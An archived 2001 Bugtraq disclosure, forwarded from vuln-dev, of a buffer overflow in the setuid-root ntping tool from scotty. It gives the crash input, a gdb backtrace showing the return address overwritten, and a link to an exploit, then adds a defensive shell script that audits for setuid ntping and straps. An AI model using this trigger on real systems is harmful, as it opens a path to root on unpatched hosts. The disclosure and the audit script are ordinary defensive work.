Bugtraq mailing list archives
suid scotty (ntping) overflow (fwd)
From: "Larry W. Cashdollar" <lwc () Vapid dhs org>
Date: Thu, 21 Jun 2001 10:55:48 -0400 (EDT)
This has circulated on vuln-dev; not sure if it made it here yet. Vendor has been notified and released a fixed version, 2.1.11.

My exploit: http://vapid.dhs.org/ntping_exp.c

There is a much better exploit out there, but I am not sure if I have permission to distribute it. So I will leave that to the author.

Credit: KF <dotslash () snosoft com>

---------- Forwarded message ----------
Date: Tue, 12 Jun 2001 05:34:16 -0400
From: KF <dotslash () snosoft com>
To: vuln-dev () securityfocus com
Subject: suid scotty (ntping) overflow

I am not sure that this made it on to the list the first time I sent it... so sorry if this is a duplicate.

    [root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
    Segmentation fault (core dumped)

Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/

What led me to research this:

arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:

> I run scotty-testsuite: what must I change on my system (Linux Slackware)?
> ==== Test generated error: can not connect straps socket: Permission denied
> straps and ntping must be installed suid root.
  ^------- Hrmm, I sure thought that was interesting to know *grin*

Vendors affected: unknown by the author of this document. Just a note I found, however...

<19990702221232.79B119410 () Galois suse de>

> Hi folks, here is the long promised posting of all suid/sgid files on an alpha of SuSE Linux 6.2 ... comments on wrong permissions are welcome. Please note that SuSE has got 5 full CD-ROMs, so that's the reason for the many, many files ... (and too many suid/sgid ones ...)
>
> ...
> -rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
> -rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
> ...

    [root@linux d0tslash]# gdb /usr/bin/ntping core
    GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    This GDB was configured as "i386-mandrake-linux"...
    (no debugging symbols found)...
    Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation fault.
    Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done.
    Loaded symbols for /lib/libnsl.so.1
    Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done.
    Loaded symbols for /lib/libresolv.so.2
    Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
    Loaded symbols for /lib/libc.so.6
    Reading symbols from /lib/ld-linux.so.2...done.
    Loaded symbols for /lib/ld-linux.so.2
    Reading symbols from /lib/libnss_files.so.2...done.
    Loaded symbols for /lib/libnss_files.so.2
    #0  0x40079b66 in getenv () from /lib/libc.so.6
    (gdb) bt
    #0  0x40079b66 in getenv () from /lib/libc.so.6
    #1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
    #2  0x4013b9de in __res_ninit () from /lib/libc.so.6
    #3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
    #4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
    #5  0x080495b8 in _start ()
    #6  0x41414141 in ?? ()
    Cannot access memory at address 0x41414141

-KF
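The practical follow-up to the thread above is an audit: find out whether the scotty helpers it names (ntping, straps) are installed setuid root on a host, which is the condition that turns this argument-length crash into a privilege issue. The script below is an added example, not part of the original posts; the sample listing is constructed from the SuSE 6.2 lines quoted above plus two made-up benign entries.

```shell
#!/bin/sh
# Added example (not from the original thread): parse ls -l style lines
# and report setuid-root files whose basename is ntping or straps.
# SAMPLE_LISTING is constructed for this example; on a real host, feed
# the output of the find command shown at the bottom instead.

SAMPLE_LISTING='-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
-rwxr-xr-x 1 root root 12000 Jun 30 11:11 ./usr/bin/scotty
-rwsr-xr-x 1 root root 30000 Jun 30 11:11 ./bin/su'

# is_suid_root LINE: succeed (exit 0) if LINE describes a setuid file
# owned by root. The setuid bit shows as 's' (or 'S' without user-exec)
# in the 4th character of the 10-character mode field.
is_suid_root() {
    mode=$(printf '%s\n' "$1" | awk '{print $1}')
    owner=$(printf '%s\n' "$1" | awk '{print $3}')
    case "$mode" in
        ???s??????|???S??????) [ "$owner" = "root" ] ;;
        *) return 1 ;;
    esac
}

# flag_scotty_suid LISTING: print the path of every setuid-root entry in
# LISTING whose basename is one of the scotty helpers from the thread.
# Any path printed should be upgraded to scotty 2.1.11 or have its
# setuid bit removed (chmod u-s) until it is.
flag_scotty_suid() {
    printf '%s\n' "$1" | while IFS= read -r line; do
        [ -n "$line" ] || continue
        is_suid_root "$line" || continue
        path=$(printf '%s\n' "$line" | awk '{print $NF}')
        case "$(basename "$path")" in
            ntping|straps) printf '%s\n' "$path" ;;
        esac
    done
}

# Demo on the constructed listing; expected to print the two scotty paths.
flag_scotty_suid "$SAMPLE_LISTING"

# Live-host variant (commented out; needs root to read every directory):
# find / -xdev -perm -4000 -type f -exec ls -ld {} + | flag_scotty_suid "$(cat)"
```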
Attachment:
ntping_exp.c